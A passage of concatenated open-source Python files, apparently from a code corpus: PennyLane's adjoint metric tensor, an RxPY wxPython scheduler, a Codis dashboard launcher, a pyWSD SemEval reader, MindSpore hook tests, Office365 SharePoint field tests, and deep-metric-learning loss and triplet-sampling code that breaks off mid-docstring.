def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=0)
qml.CNOT(wires=[0, 1])
qml.RZ(weights[2], wires=1)
qml.RZ(weights[3], wires=0)
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1)), qml.expval(qml.PauliY(1))
We can use the ``adjoint_metric_tensor`` transform to generate a new function
that returns the metric tensor of this QNode:
>>> mt_fn = qml.adjoint_metric_tensor(circuit)
>>> weights = np.array([0.1, 0.2, 0.4, 0.5], requires_grad=True)
>>> mt_fn(weights)
tensor([[ 0.25 , 0. , -0.0497, -0.0497],
[ 0. , 0.2475, 0.0243, 0.0243],
[-0.0497, 0.0243, 0.0123, 0.0123],
[-0.0497, 0.0243, 0.0123, 0.0123]], requires_grad=True)
This approach has the benefit of being significantly faster than the hardware-ready
``metric_tensor`` function:
>>> import time
>>> start_time = time.process_time()
>>> mt = mt_fn(weights)
>>> time.process_time() - start_time
0.019
>>> mt_fn_2 = qml.metric_tensor(circuit)
>>> start_time = time.process_time()
>>> mt = mt_fn_2(weights)
>>> time.process_time() - start_time
0.025
This speedup becomes more drastic for larger circuits.
The drawback of the adjoint method is that it is only available on simulators and without
shot simulations.
"""
if isinstance(circuit, qml.tape.QuantumTape):
return _adjoint_metric_tensor_tape(circuit, device)
if isinstance(circuit, (qml.QNode, qml.ExpvalCost)):
return _adjoint_metric_tensor_qnode(circuit, device, hybrid)
raise qml.QuantumFunctionError("The passed object is not a QuantumTape or QNode.")
def _adjoint_metric_tensor_tape(tape, device):
"""Computes the metric tensor of a tape using the adjoint method and a given device."""
# pylint: disable=protected-access
if device.shots is not None:
raise ValueError(
"The adjoint method for the metric tensor is only implemented for shots=None"
)
tape = qml.transforms.expand_trainable_multipar(tape)
# Divide all operations of a tape into trainable operations and blocks
# of untrainable operations after each trainable one.
trainable_operations, group_after_trainable_op = _group_operations(tape)
dim = 2**device.num_wires
# generate and extract initial state
psi = device._create_basis_state(0)
# initialize metric tensor components (which all will be real-valued)
like_real = qml.math.real(psi[0])
L = qml.math.convert_like(qml.math.zeros((tape.num_params, tape.num_params)), like_real)
T = qml.math.convert_like(qml.math.zeros((tape.num_params,)), like_real)
psi = _apply_operations(psi, group_after_trainable_op[-1], device)
for j, outer_op in enumerate(trainable_operations):
generator_1, prefactor_1 = qml.generator(outer_op)
generator_1 = qml.matrix(generator_1)
# the state vector phi is missing a factor of 1j * prefactor_1
phi = device._apply_unitary(
psi, qml.math.convert_like(generator_1, like_real), outer_op.wires
)
phi_real = qml.math.reshape(qml.math.real(phi), (dim,))
phi_imag = qml.math.reshape(qml.math.imag(phi), (dim,))
diag_value = prefactor_1**2 * (
qml.math.dot(phi_real, phi_real) + qml.math.dot(phi_imag, phi_imag)
)
L = qml.math.scatter_element_add(L, (j, j), diag_value)
lam = psi * 1.0
lam_real = qml.math.reshape(qml.math.real(lam), (dim,))
lam_imag = qml.math.reshape(qml.math.imag(lam), (dim,))
# this entry is missing a factor of 1j
value = prefactor_1 * (qml.math.dot(lam_real, phi_real) + qml.math.dot(lam_imag, phi_imag))
T = qml.math.scatter_element_add(T, (j,), value)
for i in range(j - 1, -1, -1):
# after first iteration of inner loop: apply U_{i+1}^\dagger
if i < j - 1:
phi = _apply_operations(phi, trainable_operations[i + 1], device, invert=True)
# apply V_{i}^\dagger
phi = _apply_operations(phi, group_after_trainable_op[i], device, invert=True)
lam = _apply_operations(lam, group_after_trainable_op[i], device, invert=True)
inner_op = trainable_operations[i]
# extract and apply G_i
generator_2, prefactor_2 = qml.generator(inner_op)
generator_2 = qml.matrix(generator_2)
# this state vector is missing a factor of 1j * prefactor_2
mu = device._apply_unitary(lam, qml.math.convert_like(generator_2, lam), inner_op.wires)
phi_real = qml.math.reshape(qml.math.real(phi), (dim,))
phi_imag = qml.math.reshape(qml.math.imag(phi), (dim,))
mu_real = qml.math.reshape(qml.math.real(mu), (dim,))
mu_imag = qml.math.reshape(qml.math.imag(mu), (dim,))
# this entry is missing a factor of 1j * (-1j) = 1, i.e. none
value = (
prefactor_1
* prefactor_2
* (qml.math.dot(mu_real, phi_real) + qml.math.dot(mu_imag, phi_imag))
)
L = qml.math.scatter_element_add(
L, [(i, j), (j, i)], value * qml.math.convert_like(qml.math.ones((2,)), value)
)
# apply U_i^\dagger
lam = _apply_operations(lam, inner_op, device, invert=True)
# apply U_j and V_j
psi = _apply_operations(psi, [outer_op, *group_after_trainable_op[j]], device)
# postprocessing: combine L and T into the metric tensor.
# We require outer(conj(T), T) here, but as we skipped the factor 1j above,
# the stored T is real-valued. Thus we have -1j*1j*outer(T, T) = outer(T, T)
metric_tensor = L - qml.math.tensordot(T, T, 0)
return metric_tensor
def _adjoint_metric_tensor_qnode(qnode, device, hybrid):
"""Computes the metric tensor of a qnode using the adjoint method and its device.
For ``hybrid==True`` this wrapper accounts for classical preprocessing within the
QNode.
"""
if device is None:
if isinstance(qnode, qml.ExpvalCost):
if qnode._multiple_devices: # pylint: disable=protected-access
warnings.warn(
"ExpvalCost was instantiated with multiple devices. Only the first device "
"will be used to evaluate the metric tensor with the adjoint method.",
UserWarning,
)
qnode = qnode.qnodes.qnodes[0]
device = qnode.device
cjac_fn = qml.transforms.classical_jacobian(
qnode, expand_fn=qml.transforms.expand_trainable_multipar
)
def wrapper(*args, **kwargs):
qnode.construct(args, kwargs)
mt = _adjoint_metric_tensor_tape(qnode.qtape, device)
if not hybrid:
return mt
cjac = cjac_fn(*args, **kwargs)
return _contract_metric_tensor_with_cjac(mt, cjac)
return wrapper
|
rx/concurrency/mainloopscheduler/wxscheduler.py
|
yutiansut/RxPY
| 733 |
85657
|
<gh_stars>100-1000
import logging
from rx.core import Disposable
from rx.disposables import SingleAssignmentDisposable, CompositeDisposable
from rx.concurrency.schedulerbase import SchedulerBase
log = logging.getLogger("Rx")
class WxScheduler(SchedulerBase):
"""A scheduler for a wxPython event loop."""
def __init__(self, wx):
self.wx = wx
self._timers = set()
class Timer(wx.Timer):
def __init__(self, callback):
super(Timer, self).__init__()
self.callback = callback
def Notify(self):
self.callback()
self._timer_class = Timer
def cancel_all(self):
"""Cancel all scheduled actions.
Should be called when destroying wx controls to prevent accessing
dead wx objects in actions that might be pending.
"""
for timer in self._timers:
timer.Stop()
def _wxtimer_schedule(self, time, action, state, periodic=False):
scheduler = self
msecs = self.to_relative(time)
disposable = SingleAssignmentDisposable()
periodic_state = [state]
def interval():
if periodic:
periodic_state[0] = action(periodic_state[0])
else:
disposable.disposable = action(scheduler, state)
log.debug("timeout: %s", msecs)
if msecs == 0:
msecs = 1 # wx.Timer doesn't support zero.
timer = self._timer_class(interval)
timer.Start(
msecs,
self.wx.TIMER_CONTINUOUS if periodic else self.wx.TIMER_ONE_SHOT
)
self._timers.add(timer)
def dispose():
timer.Stop()
self._timers.remove(timer)
return CompositeDisposable(disposable, Disposable.create(dispose))
def schedule(self, action, state=None):
"""Schedules an action to be executed."""
return self._wxtimer_schedule(0, action, state)
def schedule_relative(self, duetime, action, state=None):
"""Schedules an action to be executed after duetime.
Keyword arguments:
duetime -- {timedelta} Relative time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""
return self._wxtimer_schedule(duetime, action, state)
def schedule_absolute(self, duetime, action, state=None):
"""Schedules an action to be executed at duetime.
Keyword arguments:
duetime -- {datetime} Absolute time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""
duetime = self.to_datetime(duetime)
return self._wxtimer_schedule(duetime, action, state)
def schedule_periodic(self, period, action, state=None):
"""Schedules a periodic piece of work to be executed in the Qt
mainloop.
Keyword arguments:
period -- Period in milliseconds for running the work periodically.
action -- Action to be executed.
state -- [Optional] Initial state passed to the action upon the first
iteration.
Returns the disposable object used to cancel the scheduled recurring
action (best effort)."""
return self._wxtimer_schedule(period, action, state, periodic=True)
|
example/dashboard.py
|
hzhangse/codis
| 9,866 |
85698
|
<reponame>hzhangse/codis
#!/usr/bin/env python3
from utils import *
import atexit
import json
import datetime
class CodisDashboard(Process):
def __init__(self, admin_port, product_name, product_auth=None):
self.config = self._open_config(admin_port, product_name, product_auth)
self.admin_port = admin_port
self.product_name = product_name
self.product_auth = product_auth
self.logfile = "dashboard-{}.log".format(admin_port)
self.command = "codis-dashboard -c {}".format(self.config)
Process.__init__(self, self.command, self.logfile)
dict = {"admin_port": admin_port, "pid": self.proc.pid}
print(" >> codis.dashboard = " + json.dumps(dict, sort_keys=True))
@staticmethod
def _open_config(admin_port, product_name, product_auth=None):
config = 'dashboard-{}.toml'.format(admin_port)
with open(config, "w+") as f:
f.write('coordinator_name = "filesystem"\n')
f.write('coordinator_addr = "rootfs"\n')
f.write('product_name = "{}"\n'.format(product_name))
if product_auth is not None:
f.write('product_auth = "{}"\n'.format(product_auth))
f.write('admin_addr = ":{}"\n'.format(admin_port))
f.write('migration_method = "semi-async"\n')
f.write('migration_async_maxbulks = 200\n')
f.write('migration_async_maxbytes = "32mb"\n')
f.write('migration_async_numkeys = 100\n')
f.write('migration_timeout = "30s"\n')
f.write('sentinel_quorum = 2\n')
f.write('sentinel_parallel_syncs = 1\n')
f.write('sentinel_down_after = "5s"\n')
f.write('sentinel_failover_timeout = "10m"\n')
path = os.getcwd()
f.write('sentinel_notification_script = "{}"\n'.format(os.path.join(path, "sentinel_notify.sh")))
f.write('sentinel_client_reconfig_script = "{}"\n'.format(os.path.join(path, "sentinel_reconfig.sh")))
return config
if __name__ == "__main__":
children = []
atexit.register(kill_all, children)
product_name = "demo-test"
product_auth = None
children.append(CodisDashboard(18080, product_name, product_auth))
check_alive(children, 3)
while True:
print(datetime.datetime.now())
time.sleep(5)
|
pywsd/semeval.py
|
goodmami/pywsd
| 581 |
85730
|
#!/usr/bin/env python -*- coding: utf-8 -*-
#
# Python Word Sense Disambiguation (pyWSD): SemEval REader API
#
# Copyright (C) 2014-2020 alvations
# URL:
# For license information, see LICENSE.md
import os, io
from collections import namedtuple
from BeautifulSoup import BeautifulSoup as bsoup
from pywsd.utils import remove_tags, semcor_to_synset
Instance = namedtuple('instance', 'id, lemma, word')
Term = namedtuple('term', 'id, pos, lemma, sense, type')
Word = namedtuple('word', 'id, text, sentid, paraid, term')
Answer = namedtuple('answer', 'sensekey, lemma, pos')
class SemEval2007_Coarse_WSD:
"""
Object to load data from SemEval-2007 Coarse-grain all-words WSD task.
USAGE:
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> for inst, ans, sent, doc in coarse_wsd:
... print inst
... print inst.id, inst.lemma, inst.word
... print ans.sensekey
... break
instance(id=u'd001.s001.t001', lemma=u'editorial', word=u'editorial')
d001.s001.t001 editorial editorial
[u'editorial%1:10:00::']
"""
def __init__(self, path='data/semeval2007_coarse_grain_wsd/'):
self.path = path
self.test_file = self.path + 'eng-coarse-all-words.xml'
self.test_ans = self.path + 'dataset21.test.key'
def fileids(self):
""" Returns files from SemEval2007 Coarse-grain All-words WSD task. """
return [os.path.join(self.path,i) for i in os.listdir(self.path)]
def sents(self, filename=None):
"""
Returns the file, line by line. Use test_file if no filename specified.
"""
filename = filename if filename else self.test_file
with io.open(filename, 'r') as fin:
for line in fin:
yield line.strip()
def get_answers(self):
"""
Returns a {(key,value), ...} dictionary of {(instance_id,Answer),...)}
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> inst2ans = coarse_wsd.get_answers()
>>> for inst in inst2ans:
... print inst, inst2ans[inst
... break
"""
inst2ans = {}
with io.open(self.test_ans, 'r') as fin:
for line in fin:
line, _, lemma = line.strip().rpartition(' !! ')
lemma, pos = lemma[6:].split('#')
textid, _, line = line.partition(' ')
instid, _, line = line.partition(' ')
sensekey = line.split()
# What to do if there is no synset to convert to...
# synsetkey = [semcor_to_synset(i) for i in sensekey]
inst2ans[instid] = Answer(sensekey, lemma, pos)
return inst2ans
def yield_sentences(self):
test_file = io.open(self.test_file, 'r').read()
inst2ans = self.get_answers()
for text in bsoup(test_file).findAll('text'):
if not text:
continue
textid = text['id']
context_doc = " ".join([remove_tags(i) for i in
str(text).split('\n') if remove_tags(i)])
for sent in text.findAll('sentence'):
context_sent = " ".join([remove_tags(i) for i in
str(sent).split('\n') if remove_tags(i)])
yield sent, context_sent, context_doc, inst2ans, textid
def test_instances(self):
"""
Returns the test instances from SemEval2007 Coarse-grain WSD task.
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> inst2ans = coarse_wsd.get_answers()
>>> for inst in inst2ans:
... print inst, inst2ans[inst]
... break
d004.s073.t013 answer(sensekey=[u'pointer%1:06:01::', u'pointer%1:06:00::', u'pointer%1:10:00::'], lemma=u'pointer', pos=u'n')
"""
for sent, context_sent, context_doc, inst2ans, textid in self.yield_sentences():
for instance in sent.findAll('instance'):
instid = instance['id']
lemma = instance['lemma']
word = instance.text
inst = Instance(instid, lemma, word)
yield inst, inst2ans[instid],
unicode(context_sent), unicode(context_doc)
def sentences(self):
"""
Returns the instances by sentences, and yields a list of tokens,
similar to the pywsd.semcor.sentences.
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> for sent in coarse_wsd.sentences():
>>> for token in sent:
>>> print token
>>> break
>>> break
word(id=None, text=u'Your', offset=None, sentid=0, paraid=u'd001', term=None)
"""
for sentid, ys in enumerate(self.yield_sentences()):
sent, context_sent, context_doc, inst2ans, textid = ys
instances = {}
for instance in sent.findAll('instance'):
instid = instance['id']
lemma = instance['lemma']
word = instance.text
instances[instid] = Instance(instid, lemma, word)
tokens = []
for i in sent: # Iterates through BeautifulSoup object.
if str(i).startswith('<instance'): # BeautifulSoup.Tag
instid = sent.find('instance')['id']
inst = instances[instid]
answer = inst2ans[instid]
term = Term(instid, answer.pos, inst.lemma, answer.sensekey,
type='open')
tokens.append(Word(instid, inst.word,
sentid, textid, term))
else: # if BeautifulSoup.NavigableString
tokens+=[Word(None, w, sentid, textid, None)
for w in i.split()]
yield tokens
def __iter__(self):
""" Iterator function, duck-type of test_instances() """
return self.sentences()
|
tests/st/pynative/test_pynative_hook.py
|
Greatpanc/mindspore_zhb
| 3,200 |
85745
|
<reponame>Greatpanc/mindspore_zhb
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.common.dtype as mstype
from mindspore import Tensor
from mindspore import context
from mindspore import ParameterTuple
from mindspore.nn import Momentum
from mindspore.nn import WithLossCell
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from mindspore.common.initializer import TruncatedNormal
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend")
grad_all = C.GradOperation(get_all=True)
def weight_variable():
"""weight initial"""
return TruncatedNormal(0.02)
def conv(in_channels, out_channels, kernel_size, stride=1, padding=0):
"""weight initial for conv layer"""
weight = weight_variable()
return nn.Conv2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
weight_init=weight, has_bias=False, pad_mode="valid")
def fc_with_initialize(input_channels, out_channels):
"""weight initial for fc layer"""
weight = weight_variable()
bias = weight_variable()
return nn.Dense(input_channels, out_channels, weight, bias)
class test_custom_hook_function_base():
def __init__(self):
pass
def test_custom_hook_function(self, hook_function, cell_hook_function):
return hook_function, cell_hook_function
def cell_hook_function_print_grad(cell_id, grad_input, grad_output):
assert grad_output[0].asnumpy().shape == (32, 6, 14, 14)
assert grad_input[0].asnumpy().shape == (32, 16, 10, 10)
def custom_hook_function_print_and_save_grad(grad_out):
assert grad_out[0].asnumpy().shape == (32, 6, 28, 28)
class LeNet5(nn.Cell):
def __init__(self, hook_function, cell_hook_function, num_class=10):
super(LeNet5, self).__init__()
self.num_class = num_class
self.batch_size = 32
self.conv1 = conv(1, 6, 5)
self.conv2 = conv(6, 16, 5)
self.conv1.register_backward_hook(cell_hook_function)
self.fc1 = fc_with_initialize(16 * 5 * 5, 120)
self.fc2 = fc_with_initialize(120, 84)
self.fc3 = fc_with_initialize(84, self.num_class)
self.relu = nn.ReLU()
self.max_pool2d = nn.MaxPool2d(kernel_size=2, stride=2)
self.reshape = P.Reshape()
self.hook = P.HookBackward(hook_function)
def construct(self, x):
x = self.conv1(x)
x = self.relu(x)
x = self.hook(x)
x = self.max_pool2d(x)
x = self.conv2(x)
x = self.relu(x)
x = self.max_pool2d(x)
x = self.reshape(x, (self.batch_size, -1))
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.relu(x)
x = self.fc3(x)
return x
class GradWrap(nn.Cell):
""" GradWrap definition """
def __init__(self, network):
super(GradWrap, self).__init__(auto_prefix=False)
self.network = network
self.weights = ParameterTuple(filter(lambda x: x.requires_grad, network.get_parameters()))
def construct(self, x, label):
weights = self.weights
return C.GradOperation(get_by_list=True)(self.network, weights)(x, label)
class test_custom_cell_base():
def __init__(self):
pass
def test_custom_cell_function(self, cell):
return cell
class MulAdd(nn.Cell):
def construct(self, x, y):
return 2 * x + y
def bprop(self, x, y, out, dout):
assert x.asnumpy() == 1.0
assert y.asnumpy() == 2.0
assert out.asnumpy() == 4.0
assert dout.asnumpy() == 1.0
return dout, y
class Ms_Cell(nn.Cell):
def __init__(self):
super(Ms_Cell, self).__init__()
self.relu = P.ReLU()
def construct(self, x):
return self.relu(x)
def bprop(self, x, out, dout):
dout = Tensor(np.float32(0.0))
assert dout.shape == ()
return dout
class Ms_Cell_Change_Shape(nn.Cell):
def __init__(self):
super(Ms_Cell_Change_Shape, self).__init__()
self.relu = P.ReLU()
def construct(self, x):
return self.relu(x)
def bprop(self, x, out, dout):
dout = Tensor(np.ones([5, 5]).astype(np.float32))
assert dout.shape == (5, 5)
return dout
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_lenet_train_hook_function_print_and_save_grad():
hook = test_custom_hook_function_base()
function = hook.test_custom_hook_function(custom_hook_function_print_and_save_grad,
cell_hook_function_print_grad)
net = LeNet5(hook_function=function[0], cell_hook_function=function[1])
optimizer = Momentum(filter(lambda x: x.requires_grad, net.get_parameters()), 0.1, 0.9)
criterion = nn.SoftmaxCrossEntropyWithLogits(sparse=False)
net_with_criterion = WithLossCell(net, criterion)
train_network = GradWrap(net_with_criterion)
train_network.set_train()
input_data = Tensor(np.ones([net.batch_size, 1, 32, 32]).astype(np.float32) * 0.01)
label = Tensor(np.ones([net.batch_size, net.num_class]).astype(np.float32))
output = net(Tensor(input_data))
criterion(output, label)
grads = train_network(input_data, label)
success = optimizer(grads)
assert success
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_MulAdd():
custom_cell = test_custom_cell_base()
mul_add = custom_cell.test_custom_cell_function(MulAdd())
mul_add.bprop_debug = True
grad_all(mul_add)(Tensor(1, mstype.float32), Tensor(2, mstype.float32))
assert grad_all(mul_add)(Tensor(1, mstype.float32), Tensor(2, mstype.float32)) == \
(Tensor(1.0, mstype.float32), Tensor(2.0, mstype.float32))
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_Ms_Cell_Change_Shape():
custom_cell = test_custom_cell_base()
ms_Cell = custom_cell.test_custom_cell_function(Ms_Cell_Change_Shape())
ms_Cell.bprop_debug = True
with pytest.raises(RuntimeError) as ex:
grad_all(ms_Cell)(Tensor(1, mstype.float32))
assert "Shapes of input and parameter are different, input index" in str(ex.value)
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_Ms_Cell():
custom_cell = test_custom_cell_base()
ms_Cell = custom_cell.test_custom_cell_function(Ms_Cell())
ms_Cell.bprop_debug = True
assert grad_all(ms_Cell)(Tensor(1, mstype.float32)) == (Tensor(0.0, mstype.float32),)
|
tests/sharepoint/test_field.py
|
rikeshtailor/Office365-REST-Python-Client
| 544 |
85753
|
<reponame>rikeshtailor/Office365-REST-Python-Client<filename>tests/sharepoint/test_field.py<gh_stars>100-1000
import uuid
from tests.sharepoint.sharepoint_case import SPTestCase
from office365.sharepoint.fields.field import Field
from office365.sharepoint.fields.field_creation_information import FieldCreationInformation
from office365.sharepoint.fields.field_text import FieldText
from office365.sharepoint.fields.field_type import FieldType
class TestField(SPTestCase):
target_field = None # type: Field
target_field_name = "Title"
def test_1_get_site_fields(self):
site_fields = self.client.site.root_web.fields.top(2).get().execute_query()
self.assertGreater(len(site_fields), 0)
def test_2_get_field(self):
title_field = self.client.site.root_web.fields.\
get_by_internal_name_or_title(self.target_field_name).get().execute_query()
self.assertIsNotNone(title_field.internal_name)
self.assertEqual(title_field.internal_name, self.target_field_name)
self.assertIsInstance(title_field, FieldText)
self.assertIsNotNone(title_field.max_length)
def test_3_get_field_by_title(self):
title_field = self.client.site.root_web.fields.get_by_title(self.target_field_name).get().execute_query()
self.assertIsNotNone(title_field.internal_name)
self.assertEqual(title_field.internal_name, self.target_field_name)
def test_4_create_site_field(self):
field_name = "Title_" + uuid.uuid4().hex
create_field_info = FieldCreationInformation(field_name, FieldType.Text)
created_field = self.client.site.root_web.fields.add(create_field_info).execute_query()
self.assertEqual(created_field.properties["Title"], field_name)
self.__class__.target_field = created_field
def test_5_update_site_field(self):
field_to_update = self.__class__.target_field
updated_field_name = "Title_" + uuid.uuid4().hex
field_to_update.set_property('Title', updated_field_name).update().execute_query()
updated_field = self.client.site.root_web.fields.get_by_title(updated_field_name).get().execute_query()
self.assertIsNotNone(updated_field.id)
self.assertEqual(updated_field.title, updated_field_name)
def test_6_delete_site_field(self):
field_to_delete = self.__class__.target_field
field_to_delete.delete_object().execute_query()
|
DML/losses.py
|
yuichikano/Fashion-Image-Retrieval-System
| 551 |
85777
|
# Copyright 2019 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###################### LIBRARIES #################################################
import warnings
warnings.filterwarnings("ignore")
import torch, random, itertools as it, numpy as np, faiss, random
from tqdm import tqdm
from scipy.spatial.distance import cdist
from sklearn.decomposition import PCA
from sklearn.preprocessing import normalize
from PIL import Image
"""================================================================================================="""
############ LOSS SELECTION FUNCTION #####################
def loss_select(loss, opt, to_optim):
"""
Selection function which returns the respective criterion while appending to list of trainable parameters if required.
Args:
loss: str, name of loss function to return.
opt: argparse.Namespace, contains all training-specific parameters.
to_optim: list of trainable parameters. Is extend if loss function contains those as well.
Returns:
criterion (torch.nn.Module inherited), to_optim (optionally appended)
"""
if loss=='triplet':
loss_params = {'margin':opt.margin, 'sampling_method':opt.sampling}
criterion = TripletLoss(**loss_params)
elif loss=='npair':
loss_params = {'l2':opt.l2npair}
criterion = NPairLoss(**loss_params)
elif loss=='marginloss':
loss_params = {'margin':opt.margin, 'nu': opt.nu, 'beta':opt.beta, 'n_classes':opt.num_classes, 'sampling_method':opt.sampling}
criterion = MarginLoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.beta_lr, 'weight_decay':0}]
elif loss=='proxynca':
loss_params = {'num_proxies':opt.num_classes, 'embedding_dim':opt.classembed if 'num_cluster' in vars(opt).keys() else opt.embed_dim}
criterion = ProxyNCALoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.proxy_lr}]
elif loss=='crossentropy':
loss_params = {'n_classes':opt.num_classes, 'inp_dim':opt.embed_dim}
criterion = CEClassLoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.lr, 'weight_decay':0}]
else:
raise Exception('Loss {} not available!'.format(loss))
return criterion, to_optim
"""================================================================================================="""
######### MAIN SAMPLER CLASS #################################
class TupleSampler():
"""
Container for all sampling methods that can be used in conjunction with the respective loss functions.
Based on batch-wise sampling, i.e. given a batch of training data, sample useful data tuples that are
used to train the network more efficiently.
"""
def __init__(self, method='random'):
"""
Args:
method: str, name of sampling method to use.
Returns:
Nothing!
"""
self.method = method
if method=='semihard':
self.give = self.semihardsampling
if method=='softhard':
self.give = self.softhardsampling
elif method=='distance':
self.give = self.distanceweightedsampling
elif method=='npair':
self.give = self.npairsampling
elif method=='random':
self.give = self.randomsampling
def randomsampling(self, batch, labels):
"""
This methods finds all available triplets in a batch given by the classes provided in labels, and randomly
selects <len(batch)> triplets.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().numpy()
unique_classes = np.unique(labels)
indices = np.arange(len(batch))
class_dict = {i:indices[labels==i] for i in unique_classes}
sampled_triplets = [list(it.product([x],[x],[y for y in unique_classes if x!=y])) for x in unique_classes]
sampled_triplets = [x for y in sampled_triplets for x in y]
sampled_triplets = [[x for x in list(it.product(*[class_dict[j] for j in i])) if x[0]!=x[1]] for i in sampled_triplets]
sampled_triplets = [x for y in sampled_triplets for x in y]
#NOTE: The number of possible triplets is given by #unique_classes*(2*(samples_per_class-1)!)*(#unique_classes-1)*samples_per_class
sampled_triplets = random.sample(sampled_triplets, batch.shape[0])
return sampled_triplets
def semihardsampling(self, batch, labels, margin=0.2):
if isinstance(labels, torch.Tensor):
labels = labels.detach().numpy()
bs = batch.size(0)
#Return distance matrix for all elements in batch (BSxBS)
distances = self.pdist(batch.detach()).detach().cpu().numpy()
positives, negatives = [], []
anchors = []
for i in range(bs):
l, d = labels[i], distances[i]
neg = labels!=l; pos = labels==l
anchors.append(i)
pos[i] = False
p = np.random.choice(np.where(pos)[0])
positives.append(p)
#Find negatives that violate tripet constraint semi-negatives
neg_mask = np.logical_and(neg,d>d[p])
neg_mask = np.logical_and(neg_mask,d<margin+d[p])
if neg_mask.sum()>0:
negatives.append(np.random.choice(np.where(neg_mask)[0]))
else:
negatives.append(np.random.choice(np.where(neg)[0]))
sampled_triplets = [[a, p, n] for a, p, n in zip(anchors, positives, negatives)]
return sampled_triplets
def softhardsampling(self, batch, labels):
"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on semihard sampling introduced in 'https://arxiv.org/pdf/1503.03832.pdf'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().numpy()
bs = batch.size(0)
#Return distance matrix for all elements in batch (BSxBS)
distances = self.pdist(batch.detach()).detach().cpu().numpy()
positives, negatives = [], []
anchors = []
for i in range(bs):
l, d = labels[i], distances[i]
anchors.append(i)
#1 for batchelements with label l
neg = labels!=l; pos = labels==l
#0 for current anchor
pos[i] = False
#Find negatives that violate triplet constraint semi-negatives
neg_mask = np.logical_and(neg,d<d[np.where(pos)[0]].max())
#Find positives that violate triplet constraint semi-hardly
pos_mask = np.logical_and(pos,d>d[np.where(neg)[0]].min())
if pos_mask.sum()>0:
positives.append(np.random.choice(np.where(pos_mask)[0]))
else:
positives.append(np.random.choice(np.where(pos)[0]))
if neg_mask.sum()>0:
negatives.append(np.random.choice(np.where(neg_mask)[0]))
else:
negatives.append(np.random.choice(np.where(neg)[0]))
sampled_triplets = [[a, p, n] for a, p, n in zip(anchors, positives, negatives)]
return sampled_triplets
def distanceweightedsampling(self, batch, labels, lower_cutoff=0.5, upper_cutoff=1.4):
"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on distance sampling introduced in 'Sampling Matters in Deep Embedding Learning'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
lower_cutoff: float, lower cutoff value for negatives that are too close to anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
upper_cutoff: float, upper cutoff value for positives that are too far away from the anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
bs = batch.shape[0]
distances = self.pdist(batch.detach()).clamp(min=lower_cutoff)
positives, negatives = [],[]
labels_visited = []
anchors = []
for i in range(bs):
neg = labels!=labels[i]; pos = labels==labels[i]
q_d_inv = self.inverse_sphere_distances(batch, distances[i], labels, labels[i])
#Sample positives randomly
pos[i] = 0
positives.append(np.random.choice(np.where(pos)[0]))
#Sample negatives by distance
negatives.append(np.random.choice(bs,p=q_d_inv))
sampled_triplets = [[a,p,n] for a,p,n in zip(list(range(bs)), positives, negatives)]
return sampled_triplets
def npairsampling(self, batch, labels):
"""
This methods finds N-Pairs in a batch given by the classes provided in labels in the
creation fashion proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
